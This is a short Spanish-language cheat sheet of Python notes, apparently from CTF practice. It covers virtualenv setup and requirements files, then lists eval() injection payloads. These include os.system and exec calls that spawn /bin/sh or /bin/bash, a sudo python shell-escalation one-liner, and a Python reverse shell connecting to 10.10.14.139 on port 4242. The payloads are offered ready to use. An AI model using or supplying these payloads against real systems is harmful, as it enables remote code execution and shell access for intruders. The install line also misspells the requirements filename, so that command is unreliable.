Links

Python

Utils

Crear entorno virtual

virtualenv --python=/usr/bin/$PYVERSION $VENV

Crear e instalar desde 'requeriments.txt'

pip3 freeze > requirements.txt # Crear
pip3 install -r requeriments.txt # Instalar

Vulnerabilidades

eval()

#Ejecutar dentro de una función eval()
__import__("os").system("sudo /usr/bin/python3.8 -c 'import os; os.system("/bin/sh")'")
__import__("os").system("/bin/bash")
exec('import os; os.system("/bin/bash")')
exec('import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.139",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")')